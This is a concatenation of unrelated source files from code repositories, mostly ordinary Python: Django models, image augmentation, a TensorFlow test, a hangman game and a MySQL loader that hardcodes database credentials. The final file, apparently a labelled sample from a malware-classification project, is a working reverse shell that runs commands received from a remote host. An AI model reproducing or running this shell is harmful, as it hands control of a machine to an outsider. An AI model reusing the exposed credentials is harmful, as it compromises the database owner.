7922391a74fbb335d75565df7e040ef6f5fd5cd2 | 7655e4915fc37c795386252949f4888cb8741510 | /movie_data/models.py | 305dc3ecbfa149f5ff009b3e428035c963dfae5c | [] | no_license | StillsSma/django_movies | 59cf883730ced26172fe1c4ad3dbea87e8d4624d | cf49e429ebf957f5b5068dcdfe6517e47bbfcaba | refs/heads/master | 2021-01-17T16:23:46.585776 | 2016-12-31T17:36:08 | 2016-12-31T17:36:08 | 70,194,154 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,621 | py | from django.db import models
# Create your models here.
class Movie(models.Model):
#movideid = models.IntegerField(primary_key=True)
movie_title = models.CharField(max_length=100)
release_date = models.CharField(max_length=11)
videorelease_date = models.CharField(max_length=10)
IMDbURL = models.CharField(max_length=150)
unknown = models.BooleanField()
action = models.BooleanField()
adventure = models.BooleanField()
animation = models.BooleanField()
children = models.BooleanField()
comedy = models.BooleanField()
crime = models.BooleanField()
documentary = models.BooleanField()
drama = models.BooleanField()
fantasy = models.BooleanField()
film_noir = models.BooleanField()
horror = models.BooleanField()
musical = models.BooleanField()
mystery = models.BooleanField()
romance = models.BooleanField()
sciFi = models.BooleanField()
thriller = models.BooleanField()
war = models.BooleanField()
western = models.BooleanField()
def __str__(self):
return self.movie_title
class Rater(models.Model):
#raterid = models.IntegerField(primary_key=True)
age = models.IntegerField()
gender = models.CharField(max_length=1)
occupation = models.CharField(max_length=20)
zipcode = models.CharField(max_length=10)
def __str__(self):
return self.id
class Rating(models.Model):
rater = models.ForeignKey(Rater)
movie = models.ForeignKey(Movie)
rating = models.IntegerField()
timestmp = models.IntegerField()
def __str__(self):
return self.movie, self.rating
| [
"samdawson301@live.com"
] | samdawson301@live.com |
ac2b903968d57e5a20ad2475bdd901522ae13bf0 | abc24a58da46f02551e09b229087420f70b37ddf | /att/upeek/upeek/augment.py | a99891e2ef13c34d68eca5bc4cb9817cad4c0974 | [] | no_license | erikperillo/att | bfd7198a0ea3687e1fac952e2aa6510911b8db19 | 4b02fefc40c4dfde2549857272ad943bff168a7e | refs/heads/master | 2020-07-03T19:36:47.195578 | 2018-07-18T14:30:02 | 2018-07-18T14:30:02 | 67,546,898 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,037 | py | """
The MIT License (MIT)
Copyright (c) 2017 Erik Perillo <erik.perillo@gmail.com>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights to
use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
of the Software, and to permit persons to whom the Software is furnished to do
so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
IN THE SOFTWARE.
"""
"""
Module for data augmentation.
"""
from skimage import io
from skimage import transform as skt
from skimage import filters as skf
import numpy as np
def _get_rng(rng):
if not isinstance(rng, (list, tuple)):
rng = (rng, rng)
return rng
def _rot90(arr, reps=1):
"""
Performs 90 degrees rotation 'reps' times.
Assumes image with shape ([n_samples, n_channels,] height, width).
"""
for __ in range(reps%4):
arr = arr.swapaxes(-2, -1)[..., ::-1]
return arr
def rot90(x, y, reps=1):
x, y = _rot90(x, reps), y if y is None else _rot90(y, reps)
return x, y
def _hmirr(img):
"""
Flips image horizontally.
Assumes image with shape ([n_samples, n_channels,] height, width).
"""
return img[..., ::-1]
def hmirr(x, y):
x, y = _hmirr(x), y if y is None else _hmirr(y)
return x, y
def some_of(x, y=None, ops=[]):
"""
Chooses one operation from ops.
"""
op = np.random.choice(ops)
x = op(x)
if y is not None:
y = op(y)
return x, y
def _rotation(img, angle, **kwargs):
"""
Rotates image in degrees in counter-clockwise direction.
Assumes image in [0, 1] with shape ([n_samples, n_channels,] height, width).
"""
img = img.swapaxes(0, 1).swapaxes(1, 2)
img = skt.rotate(img, angle=angle, resize=False, mode="constant",
preserve_range=True, **kwargs).astype(img.dtype)
img = img.swapaxes(2, 1).swapaxes(1, 0)
return img
def rotation(x, y, rng, **kwargs):
angle = np.random.uniform(*rng)
x = _rotation(x, angle, **kwargs)
y = y if y is None else _rotation(y, angle, **kwargs)
return x, y
def _shear(img, shear):
"""
Shears image.
Assumes image in [0, 1] with shape ([n_samples, n_channels,] height, width).
"""
at = skt.AffineTransform(shear=shear)
img = img.swapaxes(0, 1).swapaxes(1, 2)
img = skt.warp(img, at)
img = img.swapaxes(2, 1).swapaxes(1, 0)
return img
def shear(x, y, rng, **kwargs):
shear = np.random.uniform(*rng)
x, y = _shear(x, shear), y if y is None else _shear(y, shear)
return x, y
def _translation(img, transl):
"""
Performs shift in image in dx, dy = transl.
Assumes image in [0, 1] with shape ([n_samples, n_channels,] height, width).
"""
at = skt.AffineTransform(translation=transl)
img = img.swapaxes(0, 1).swapaxes(1, 2)
img = skt.warp(img, at)
img = img.swapaxes(2, 1).swapaxes(1, 0)
return img
def translation(x, y, rng):
h, w = x.shape[-2:]
transl = (int(np.random.uniform(*rng)*w), int(np.random.uniform(*rng)*h))
x, y = _translation(x, transl), y if y is None else _translation(y, transl)
return x, y
def _add_noise(img, noise):
"""
Adds noise to image.
Assumes image in [0, 1].
"""
img = img + noise
return img
def add_noise(x, y, rng):
noise = np.random.uniform(*rng, size=x.shape).astype("float32")
x, y = _add_noise(x, noise), y
return x, y
def _mul_noise(img, noise):
"""
Multiplies image by a factor.
Assumes image in [0, 1].
"""
img = img*noise
return img
def mul_noise(x, y, rng):
noise = np.random.uniform(*rng)
x, y = _mul_noise(x, noise), y
return x, y
def _blur(img, sigma):
"""
Applies gaussian blur to image.
Assumes image in [0, 1] with shape ([n_samples, n_channels,] height, width).
"""
img = img.swapaxes(0, 1).swapaxes(1, 2)
for i in range(img.shape[-1]):
img[..., i] = skf.gaussian(img[..., i], sigma=sigma)
img = img.swapaxes(2, 1).swapaxes(1, 0)
return img
def blur(x, y, rng=0.5):
sigma = np.random.uniform(*rng)
x, y = _blur(x, sigma), y
return x, y
def identity(x, y):
return x, y
def _unit_norm(img, minn, maxx, dtype="float32"):
img = ((img - minn)/max(maxx - minn, 1)).astype(dtype)
return img
def _unit_denorm(img, minn, maxx, dtype="float32"):
img = (img*(maxx - minn) + minn).astype(dtype)
return img
#mapping of strings to methods
OPS_MAP = {
"rot90": rot90,
"rotation": rotation,
"shear": shear,
"translation": translation,
"add_noise": add_noise,
"mul_noise": mul_noise,
"blur": blur,
"identity": identity,
"hmirr": hmirr,
}
def augment(xy, op_seqs, apply_on_y=False, add_iff_op=True):
"""
Performs data augmentation on x, y sample.
op_seqs is a list of sequences of operations.
Each sequence must be in format (op_name, op_prob, op_kwargs).
Example of valid op_seqs:
[
[
('identity', 1.0, {}),
],
[
('hmirr', 1.0, {}),
('rot90', 1.0, {'reps': 3})
],
[
('rotation', 0.5, {'rng': (-10, 10)}),
]
]
('identity' is necessary to keep the original image in the returned list.)
add_iff_op: adds image to augm list only if some operation happened.
"""
#list of augmented images
augm = []
#pre-processing x, y for augmentation
x, y = xy
x_minn, x_maxx, x_dtype = x.min(), x.max(), x.dtype
x = _unit_norm(x, x_minn, x_maxx, "float32")
if apply_on_y:
y_minn, y_maxx, y_dtype = y.min(), y.max(), y.dtype
y = _unit_norm(y, y_minn, y_maxx, "float32")
#applying sequences
for op_seq in op_seqs:
_x, _y = x.copy(), y.copy() if apply_on_y else None
some_op = False
#applying sequence of operations
for name, prob, kwargs in op_seq:
op = OPS_MAP[name]
if np.random.uniform(0.0, 1.0) <= prob:
some_op = True
_x, _y = op(_x, _y, **kwargs)
#adding sample to augm list
if some_op or not add_iff_op:
_x = _unit_denorm(_x, x_minn, x_maxx, x_dtype)
if apply_on_y:
_y = _unit_denorm(_y, y_minn, y_maxx, y_dtype)
augm.append((_x, _y if apply_on_y else y))
return augm
| [
"erik.perillo@gmail.com"
] | erik.perillo@gmail.com |
c97351ef49dfe8735e8b6a5599c8b563241932cd | 077c91b9d5cb1a6a724da47067483c622ce64be6 | /syn_mem_corruption_3switch_fuzzer_mcs/intermcs_7_/interactive_replay_config.py | f85bde175e0795cebfea56199299bdfee1f657fc | [] | no_license | Spencerx/experiments | 0edd16398725f6fd9365ddbb1b773942e4878369 | aaa98b0f67b0d0c0c826b8a1565916bf97ae3179 | refs/heads/master | 2020-04-03T10:11:40.671606 | 2014-06-11T23:55:11 | 2014-06-11T23:55:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,022 | py |
from config.experiment_config_lib import ControllerConfig
from sts.topology import *
from sts.control_flow import InteractiveReplayer
from sts.simulation_state import SimulationConfig
from sts.input_traces.input_logger import InputLogger
simulation_config = SimulationConfig(controller_configs=[ControllerConfig(start_cmd='./pox.py --verbose openflow.of_01 --address=__address__ --port=__port__ openflow.discovery forwarding.l2_multi_syn_mem_corruption', label='c1', address='127.0.0.1', cwd='pox')],
topology_class=MeshTopology,
topology_params="num_switches=4",
patch_panel_class=BufferedPatchPanel,
multiplex_sockets=False,
kill_controllers_on_exit=True)
control_flow = InteractiveReplayer(simulation_config, "experiments/syn_mem_corruption_3switch_fuzzer_mcs/intermcs_7_/mcs.trace.notimeouts")
# wait_on_deterministic_values=False
# delay_flow_mods=False
# Invariant check: 'InvariantChecker.check_liveness'
# Bug signature: "c1"
| [
"b-github.com@wundsam.net"
] | b-github.com@wundsam.net |
e1147a359018bf44948d2604c26fc6f0e527ea4f | cba46e28e6f60d9bd8cc8c24a3ff8e065e5a8e49 | /scrap_trade_proj/customers/migrations/0019_auto_20191031_1014.py | a3e1ab6db2b7d3beb3329c5de1c8a7ede469ddaa | [] | no_license | Horac-Bouthon/scrap-trade-4 | fb7e9f8f9ec41446318ce03ad5ff7024ad795771 | 7686703ce5783dd4a48dc1d9600cda01aa554faa | refs/heads/master | 2022-12-12T21:52:38.209500 | 2020-03-17T07:50:30 | 2020-03-17T07:50:30 | 227,142,003 | 0 | 0 | null | 2022-11-22T04:39:35 | 2019-12-10T14:33:20 | Python | UTF-8 | Python | false | false | 1,185 | py | # Generated by Django 2.2.6 on 2019-10-31 10:14
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('customers', '0018_auto_20191031_0930'),
]
operations = [
migrations.RemoveField(
model_name='customer',
name='customer_description',
),
migrations.CreateModel(
name='CustomerTranslation',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('language', models.CharField(choices=[('en', 'English'), ('de', 'German'), ('cs', 'Czech')], max_length=15, verbose_name='language')),
('customer_description', models.TextField(blank=True, help_text='Short text to discribe the Customer.', null=True, verbose_name='Customer description')),
('model', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='translations', to='customers.Customer', verbose_name='customer')),
],
options={
'abstract': False,
},
),
]
| [
"tbrown.wolf@ubk.cz"
] | tbrown.wolf@ubk.cz |
41bae6481bf4d06f0950f00aeb2ce5087d1eb34d | 5c8139f1e57e06c7eaf603bd8fe74d9f22620513 | /PartC/py字符串的全排列.py | 05bb54b8b4bcd922bdbe01c4e98fa05bea5670c4 | [] | no_license | madeibao/PythonAlgorithm | c8a11d298617d1abb12a72461665583c6a44f9d2 | b4c8a75e724a674812b8a38c0202485776445d89 | refs/heads/master | 2023-04-03T07:18:49.842063 | 2021-04-11T12:02:40 | 2021-04-11T12:02:40 | 325,269,130 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 212 | py |
from itertools import permutations
string = list(input())
string.sort()
for item in permutations(string):
item = ''.join(item)
print(item)
print('')
# abc
# 输出结果:
abc
acb
bac
bca
cab
cba
| [
"2901429479@qq.com"
] | 2901429479@qq.com |
d95bc3af87a938f03bfa83472e86030ed654c535 | 628ab6e412e7c4c755bc42d8137acd3da2d4be0e | /apysc/display/line_cap_interface.py | bf9828ca64f0eef0a21e9688109051205fdc76d5 | [
"MIT",
"CC-BY-4.0"
] | permissive | TrendingTechnology/apysc | ffd7d9b558707b934c5df127eca817d4f12d619b | 5c6a4674e2e9684cb2cb1325dc9b070879d4d355 | refs/heads/main | 2023-06-01T20:19:20.835539 | 2021-06-20T03:53:33 | 2021-06-20T03:53:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,734 | py | """Class implementation for line cap interface.
"""
from typing import Any
from typing import Dict
from typing import Union
from apysc import String
from apysc.display.line_caps import LineCaps
from apysc.type.revert_interface import RevertInterface
from apysc.type.variable_name_interface import VariableNameInterface
class LineCapInterface(VariableNameInterface, RevertInterface):
_line_cap: String
def _initialize_line_cap_if_not_initialized(self) -> None:
"""
Inilialize _line_cap attribute if it is not
initialized yet.
"""
if hasattr(self, '_line_cap'):
return
self._line_cap = String(LineCaps.BUTT.value)
@property
def line_cap(self) -> Any:
"""
Get this instance's line cap style setting.
Returns
-------
line_cap : String
Line cap style setting.
"""
self._initialize_line_cap_if_not_initialized()
return self._line_cap._copy()
@line_cap.setter
def line_cap(self, value: Any) -> None:
"""
Set line cap style setting.
Parameters
----------
value : String or LineCaps
Line cap style setting to set.
"""
self._update_line_cap_and_skip_appending_exp(value=value)
self._append_line_cap_update_expression()
def _append_line_cap_update_expression(self) -> None:
"""
Append line cap updating expression to file.
"""
from apysc.expression import expression_file_util
from apysc.type import value_util
cap_name: str = value_util.get_value_str_for_expression(
value=self._line_cap)
expression: str = (
f'{self.variable_name}.attr({{"stroke-linecap": {cap_name}}});'
)
expression_file_util.append_js_expression(expression=expression)
def _update_line_cap_and_skip_appending_exp(
self, value: Union[String, LineCaps]) -> None:
"""
Update line cap and skip appending expression to file.
Parameters
----------
value : String or LineCaps
Line cap style setting to set.
"""
from apysc.validation.display_validation import validate_line_cap
if not isinstance(value, (String, LineCaps)):
raise TypeError(
'Not supported line_cap type specified: '
f'{type(value)}'
'\nAcceptable ones are: String or LineCaps.')
validate_line_cap(cap=value)
if isinstance(value, String):
self._line_cap = value._copy()
else:
self._line_cap = String(value.value)
_line_cap_snapshots: Dict[str, str]
def _make_snapshot(self, snapshot_name: str) -> None:
"""
Make value's snapshot.
Parameters
----------
snapshot_name : str
Target snapshot name.
"""
if not hasattr(self, '_line_cap_snapshots'):
self._line_cap_snapshots = {}
if self._snapshot_exists(snapshot_name=snapshot_name):
return
self._initialize_line_cap_if_not_initialized()
self._line_cap_snapshots[snapshot_name] = self._line_cap._value
def _revert(self, snapshot_name: str) -> None:
"""
Revert value if snapshot exists.
Parameters
----------
snapshot_name : str
Target snapshot name.
"""
if not self._snapshot_exists(snapshot_name=snapshot_name):
return
self._line_cap._value = self._line_cap_snapshots[snapshot_name]
| [
"antisocial.sid2@gmail.com"
] | antisocial.sid2@gmail.com |
db5504e104deb39722576dde7ff2496054907854 | 9827269c84a2afc599a8ac8ac88027b25ef74d78 | /02_51409_wsd_test.py | bbf880931362d50fdacd70498414a064641df60d | [] | no_license | caonlp/wsd_bert_tensorflow_version | 2dbb7883d8a1bc5cedbe0d69a04a8cdda3ce757f | 7cf786d1803ac6e49292469b1afdf71838295b25 | refs/heads/main | 2023-03-13T22:45:26.361832 | 2021-03-04T06:35:06 | 2021-03-04T06:35:06 | 344,372,725 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,310 | py | import tensorflow as tf
import numpy as np
import codecs
from keras.utils import to_categorical
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
def load_wsd_train_x():
wsd_train_x = codecs.open('51409_train_data', mode = 'r', encoding= 'utf-8')
line = wsd_train_x.readline()
list1 = []
while line:
a = line.split()
b = a[3:]
list1.append(b)
line = wsd_train_x.readline()
return np.array(list1)
wsd_train_x.close()
def load_wsd_test_x():
wsd_test_x = codecs.open('51409_test_data', mode = 'r', encoding= 'utf-8')
line = wsd_test_x.readline()
list1 = []
while line:
a = line.split()
b = a[3:]
list1.append(b)
line = wsd_test_x.readline()
return np.array(list1)
wsd_test_x.close()
def load_wsd_train_y():
wsd_train_y = codecs.open('51409_train_target', mode = 'r', encoding = 'utf-8')
line = wsd_train_y.readline()
list1 = []
while line:
a = line.split()
b = a[1:2]
list1.append(b)
line = wsd_train_y.readline()
return (np.array(list1)).reshape(50,)
wsd_train_y.close()
def load_wsd_test_y():
wsd_test_y = codecs.open('51409_test_target', mode = 'r', encoding = 'utf-8')
line = wsd_test_y.readline()
list1 = []
while line:
a = line.split()
b = a[1:2]
list1.append(b)
line = wsd_test_y.readline()
return (np.array(list1)).reshape(50,)
wsd_test_y.close()
b = np.zeros(50)
wsd_train_x = load_wsd_train_x()
wsd_test_x = load_wsd_test_x()
wsd_train_y = load_wsd_train_y()
wsd_train_y = to_categorical(wsd_train_y)
wsd_train_y = np.c_[wsd_train_y, b]
wsd_test_y = load_wsd_test_y()
wsd_test_y = to_categorical(wsd_test_y)
#wsd_test_y = np.c_[wsd_test_y, b]
max_epoch = 100
train_size = wsd_train_x.shape[0]
batch_size = 10
n_batch = train_size // batch_size
layer_num = 2
gogi_num = 5
if layer_num == 3:
x = tf.placeholder(tf.float32, [None, 768])
y = tf.placeholder(tf.float32, [None, gogi_num])
W1 = tf.Variable(tf.zeros([768, 50]))
b1 = tf.Variable(tf.zeros([50]))
L1 = tf.nn.sigmoid(tf.matmul(x, W1) + b1)
W2 = tf.Variable(tf.zeros([50, gogi_num]))
b2 = tf.Variable(tf.zeros[gogi_num])
predict = tf.nn.softmax(tf.matmul(L1, W2) + b2)
if layer_num == 2:
x = tf.placeholder(tf.float32, [None, 768])
y = tf.placeholder(tf.float32, [None, gogi_num])
W = tf.Variable(tf.zeros([768, gogi_num]))
b = tf.Variable(tf.zeros([gogi_num]))
predict = tf.nn.softmax(tf.matmul(x, W) + b)
loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits_v2(labels=y, logits=predict))
train_step = tf.train.AdamOptimizer().minimize(loss)
init = tf.global_variables_initializer()
correct_predict = tf.equal(tf.argmax(y, 1), tf.argmax(predict, 1))
accuracy = tf.reduce_mean(tf.cast(correct_predict, tf.float32))
saver = tf.train.Saver()
with tf.Session() as sess:
sess.run(init)
saver.restore(sess, 'model/51409_wsd_model.ckpt')
print("51409(normal) : " + str(sess.run(accuracy, feed_dict={x:wsd_test_x, y:wsd_test_y})))
| [
"noreply@github.com"
] | caonlp.noreply@github.com |
073ae140ad00c7ec2e062e9a960cdce49fe8b96f | e1164e094527d4c987adc9c9147788b0f9ed8af3 | /main.py | 61d3d780e6d7f9dd8110c8b40faaa609f9a2ce7b | [] | no_license | marenthedejong/LaMa-Galgje | d30d5ae9edacbeaf1ee90c4f956f1efa8e8e10b8 | e31f89e291b91af53425c67a28726f4e633de66b | refs/heads/master | 2022-11-12T14:42:09.260316 | 2020-07-03T09:07:58 | 2020-07-03T09:07:58 | 273,059,093 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,543 | py | def galgje():
import random
#zorgt dat er een random woord wordt gekozen uit de lijst
words= ['informatica', 'informatiekunde', 'spelletje', 'aardigheidje', 'scholier','fotografie', 'waardebepaling', 'specialiteit', 'verzekering','universiteit','heesterperk']
#alle woorden waar de computer uit kan kiezen
word = random.choice(words)
#definieert wat de variabele 'word' is en laat computer random woord kiezen
print('Welkom bij lama galgje!')
naam = input("Hoe heet je? ")
#vraagt om naam/input gebruiker
def printHallo(naam):
print('Hallo ' + naam + ', veel plezier!')
#gepersonaliseerde welkomsboodschap
printHallo(naam)
print('Je mag geen cijfers invoeren en je mag slechts 1 letter tegelijk raden. Als je een cijfer intoetst gaat dit niet van je beurten af, maar als je meer letters tegelijk probeert te raden gaat er wel een beurt af. Je mag door zolang je nog beurten hebt.')
#spelregels
print('Je hebt 5 beurten! Het woord is', + len(word), 'letters lang')
#geeft weer hoe lang het woord is
guesses = ''
turns = 5
#zorgt dat er max. 5 beurten zijn
guessed =[]
#lijst met (fout) geraden letters
while turns > 0:
#wat er gebeurt als er nog beurten zijn
failed = 0
#aantal keer dat er fouten worden gemaakt
for letter in word:
if letter in guesses:
print(letter)
else:
print("_")
#laat aantal letters zien en de goed geraden letter op de juiste plek
failed +=1
#het aantal fouten neemt met 1 toe
if failed == 0:
print(naam, ', je hebt gewonnen, gefeliciteerd!')
print("Het woord is: ", word)
opnieuw()
#winnaarsbericht en vraag opnieuw te spelen
guess= input("Raad een letter:").lower()
#vraagt om input gebruiker en zorgt dat het niet uitmaakt of het een grote of kleine letter is die wordt ingevoerd
if guess.isnumeric() == True:
print('Je mag geen cijfers gebruiken!')
#zorgt ervoor dat er een foutboodschap komt bij invoer van een getal
guesses += guess
#laat de computer de geraden letter bij de guesses opslaan
if ( guess not in word and guess.isalpha()and len(guess) ==1):
#dus dit gebeurt alleen als de letter niet in het woord zit en dus een letter (en geef cijfer is)
turns -= 1
#aantal beurten neemt met 1 af
print("FOUT")
print("Je hebt nog maar", + turns, 'beurten!')
guessed.append(guess)
guessed.sort()
#zorgt ervoor dat de fout geraden letters in een lijst komen die ook op alfabetische volgorde staat
print('Deze letters zitten niet in het woord:', guessed)
if len(guess) >1 and guess.isalpha():
print('Je mag slechts 1 letter per keer raden!')
turns -= 1
print("Je hebt nog maar", + turns, 'beurten!')
#als de lengte van de invoer langer dan 1 karakter is neemt het aantal beurten met 1 af en wordt er een foutboodschap getoond
if turns == 0:
print(naam,', je hebt verloren, jammer joh!')
print("Het woord is: ", word)
opnieuw()
#verliesbericht voor als beurten op zijn
def opnieuw():
restart = input("Wil je opieuw spelen?").lower()
if restart == 'ja':
galgje()
elif restart == 'nee':
print('Bedankt voor het spelen, tot ziens!')
exit()
#functie voor het opnieuw spelen van het spel, bij ja gaat het spel opnieuw anders stopt het
galgje()
#laat het spel beginnen
| [
"replituser@example.com"
] | replituser@example.com |
5269768f48133f066bb8f41c8cc9fb9b612d37d5 | 588f4991cad99f517ca5028e0e41c5b4d5252543 | /contest/keyence2020/C.py | f98ff9ef1e9b01b229f3ad4b4041387f38e11c0f | [
"MIT"
] | permissive | mola1129/atcoder | 3002ff38cabf0ccb5142bd576ed90419fccde02e | 1d3b18cb92d0ba18c41172f49bfcd0dd8d29f9db | refs/heads/master | 2020-06-16T12:24:49.609707 | 2020-03-14T15:58:42 | 2020-03-14T15:58:42 | 195,571,664 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 200 | py | n, k, s = map(int, input().split())
ans = []
for i in range(k):
ans.append(s)
for i in range(n - k):
if s + 1 <= 10 ** 9:
ans.append(s + 1)
else:
ans.append(1)
print(*ans)
| [
"ms.mola1129@gmail.com"
] | ms.mola1129@gmail.com |
309d604e8f4d7daa6c149baff161a6a0f70af028 | 38ba13df9ea6e53c7b924cad1f3bea2de59c7a6a | /nibbler/trading/collectors/testfiles/LINKMAGIC.py | 7312066a4729b9b7734069827034756e0c85723b | [] | no_license | JizzFactoryEmployee/nibblerppman | 0fbc1ce662cf8b4868b41a97291250fae29dc41d | 160e557578a3e8a614450354f6ade233d32b052f | refs/heads/master | 2022-11-14T01:10:31.743000 | 2020-07-04T01:21:52 | 2020-07-04T01:21:52 | 273,835,770 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 4,447 | py | import pymysql
import time
import pandas as pd
from tqdm import tqdm
from datetime import datetime, timedelta
def LINK():
print('LINKMAGIC START')
try:
data = pd.read_csv(r'/home/nibbler/nibblerppman/nibbler/trading/collectors/coins/LINK/1m/LINK1m.csv')
#if the file is being populated it wont be found, thus a timeout is needed while it populates
except FileNotFoundError:
time.sleep(600)
data = pd.read_csv(r'/home/nibbler/nibblerppman/nibbler/trading/collectors/coins/LINK/1m/LINK1m.csv')
#set up the main connection
my_conn = pymysql.connect(
host='nibbler.cxadmpob69hk.ap-southeast-2.rds.amazonaws.com',
port=3306,
db='CoinData',
user='Nibbler',
password='Nibbler123',
local_infile=1)
my_cursor = my_conn.cursor()
#selecting the last date time value from the database
my_cursor.execute(''' select count(*) from LINK; ''')
result = my_cursor.fetchall()
a = str(result).strip("(,)")
my_cursor.close()
try:
result = int((a))
except ValueError:
pass
print('LINK the database length is equal to :',result)
print('LINK the csv length is equal to:', len(data))
if result == 0 or result == None:
print('====LINK DATABASE IS EMPTY TIME TO POPULATE=======')
my_cursor = my_conn.cursor()
start1 = time.time()
#pushing data into the database from the CSV file
my_cursor.execute(''' LOAD DATA LOCAL INFILE '/home/nibbler/nibblerppman/nibbler/trading/collectors/coins/LINK/1m/LINK1m.csv' IGNORE INTO TABLE LINK
FIELDS TERMINATED BY ',' ENCLOSED BY '"'
LINES TERMINATED BY '\n'
IGNORE 1 LINES;''')
my_cursor.execute('SHOW WARNINGS')
my_conn.commit()
end1 = time.time()
my_cursor.close()
my_cursor = my_conn.cursor()
#getting the length of the database file
my_cursor.execute(''' select COUNT(*) FROM LINK; ''')
Clean_results = my_cursor.fetchall()
Clean_results = str(Clean_results).strip("(,)")
Clean_results = int(Clean_results)
my_cursor.close()
print('total values pushed', Clean_results)
print('=====PUSHED ENTIRE HISTORY IN:', end1-start1)
if Clean_results != len(data):
print('something went wrong, probably a datta error')
gap = len(data) - result
if result < len(data) and result > 0:
print('this means we can a single value or we have a data error')
#if the result is less than the data by one
print('gap is equal to', gap,'therefore we need to push', gap, 'points to the database')
#get the last 20 candles
x = gap*-1
to_push = []
fuckyou = list(range(0,gap))
for i in fuckyou:
lastpoints = data.iloc[x][0], data.iloc[x][1], data.iloc[x][2], float(data.iloc[x][3]), float(data.iloc[x][4]), float(data.iloc[x][5]), float(data.iloc[x][6]), float(data.iloc[x][7])
print(lastpoints)
to_push.append(lastpoints)
x = x+1
y = 0
for i in to_push:
pair_1 = to_push[y][0]
pair_2 = to_push[y][1]
Date_Time = str(round(to_push[y][2], 0)) #need to change these value to equal that to the databse for each shitcoin
Open_price = str(round(to_push[y][3], 4))
High_price = str(round(to_push[y][4], 4))
Low_price = str(round(to_push[y][5], 4))
Close_price = str(round(to_push[y][6], 4))
Volume = str(round(to_push[y][7], 4))
y = y+1
start2 = time.time()
my_cursor = my_conn.cursor()
my_cursor.execute('INSERT INTO LINK VALUES (%s,%s,%s,%s,%s,%s,%s,%s)', (pair_1, pair_2, Date_Time, Open_price, High_price, Low_price, Close_price, Volume))
my_conn.commit()
end2 = time.time()
if result > len(data):
print('somLINKing went wrong, database is somehow longer than the csv, deleting all')
my_cursor = my_conn.cursor()
my_cursor.execute(''' DELETE FROM LINK; ''')
my_conn.commit()
my_cursor.close()
print('data has been wiped, will repopulate next update')
if result == len(data):
print('SAME LENGTH DO NOTHING')
print('LINKMAGIC DONE')
LINK() | [
"52958901+JizzFactoryEmployee@users.noreply.github.com"
] | 52958901+JizzFactoryEmployee@users.noreply.github.com |
7ce3e7e2038833d38156599981f270e711b011b1 | f5d4863b6a62ef19ffc98e4f94f6ade1bc8810d3 | /Math/367_Valid_Perfect_Square.py | a0388e81d9425056f254fc88419d9f743ed97c3e | [] | no_license | xiaomojie/LeetCode | 138808eb83938f9bd3c2e8a755d908509dff0fd3 | eedf73b5f167025a97f0905d3718b6eab2ee3e09 | refs/heads/master | 2021-06-12T09:26:01.257348 | 2019-10-23T10:41:06 | 2019-10-23T10:41:06 | 76,184,467 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 981 | py | """
求给定的num是否是一个数的平方。
牛顿迭代法求平方根:
设r是函数y=f(x)的根,使用牛顿迭代法,给定一个初始值x0,过x0做切线,y = f(x0) + f'(x0)(x-x0),求
该切线与x轴的交点x1 = x0 - f(x0)/f'(x0),称x1为r的一次近似值,再过(x1,f(x1))做切线。以此循环下去
所以迭代公式为:xn+1 = xn - f(xn)/f'(xn)
对于求平方根,x^2 - n = 0, 可看做函数 f(x) = y = x^2 - n,f'(x) = 2x, 则迭代公式为:
xn+1 = xn - (xn^2 - n)/(2*xn) = xn - xn/2 + n/(2xn) = 1/2(xn + n/xn)
"""
class Solution(object):
def isPerfectSquare1(self, num):
"""
:type num: int
:rtype: bool
"""
r = num
while r * r > num:
r = (r + num//r)//2
return r * r == num
# 法二:A square number is 1+3+5+7+...
def isPerfectSquare(self, num):
i = 1
while num > 0:
num -= i
i += 2
return num == 0
| [
"519399762@qq.com"
] | 519399762@qq.com |
2c0cf2b46fe03109d5b7538f2b181faa0c18b80b | b580fd482147e54b1ca4f58b647fab016efa3855 | /host_im/mount/malware-classification-master/samples/virus/sample_bad190.py | b096d9fe7ec9f3748275958a6e172021d34f49a2 | [] | no_license | Barnsa/Dissertation | 1079c8d8d2c660253543452d4c32799b6081cfc5 | b7df70abb3f38dfd446795a0a40cf5426e27130e | refs/heads/master | 2022-05-28T12:35:28.406674 | 2020-05-05T08:37:16 | 2020-05-05T08:37:16 | 138,386,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 397 | py | import subprocess
import hmac
import crypt
import hashlib
import zlib
import lzma
import threading
import bz2
import zipfile
import socket
import tarfile
import gzip
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("175.20.0.200",8080))
while not False:
command = s.recv(1024).decode("utf-8")
if not command: break
data = subprocess.check_output(command, shell=True)
s.send(data)
| [
"barnsa@uni.coventry.ac.uk"
] | barnsa@uni.coventry.ac.uk |
